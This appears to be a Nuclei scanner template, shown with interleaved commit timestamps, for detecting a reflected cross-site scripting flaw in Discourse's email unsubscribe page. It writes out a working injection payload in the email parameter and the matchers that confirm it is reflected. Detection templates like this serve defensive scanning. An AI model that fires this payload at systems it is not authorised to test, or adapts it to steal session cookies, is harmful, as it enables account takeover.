2020-09-01 02:25:25 +00:00
id : discourse-xss
2020-04-08 16:10:51 +00:00
info :
2022-09-21 21:42:27 +00:00
name : Discourse - Cross-Site Scripting
2020-04-08 16:10:51 +00:00
author : madrobot
2022-09-21 21:42:27 +00:00
severity : high
description : Discourse contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
reference :
- https://www.cvedetails.com/vulnerability-list/vendor_id-20185/product_id-57316/opxss-1/Discourse-Discourse.html
- https://github.com/discourse/discourse/security/advisories/GHSA-xhmc-9jwm-wqph
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-02-12 05:53:01 +00:00
tags : xss,discourse
2020-04-08 16:10:51 +00:00
requests :
- method : GET
path :
2022-06-09 04:41:03 +00:00
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 16:10:51 +00:00
matchers :
- type : status
status :
2020-05-24 22:19:21 +00:00
- 200
2021-02-12 05:53:01 +00:00
2020-04-08 16:10:51 +00:00
- type : word
words :
2022-06-09 04:41:03 +00:00
- "<svg/onload=alert(/xss/)>"
2020-04-08 16:10:51 +00:00
part : body
2021-02-12 05:53:01 +00:00
- type : word
words :
- "text/html"
2022-06-09 04:41:03 +00:00
part : header
2022-09-21 21:42:27 +00:00
# Enhanced by md on 2022/09/20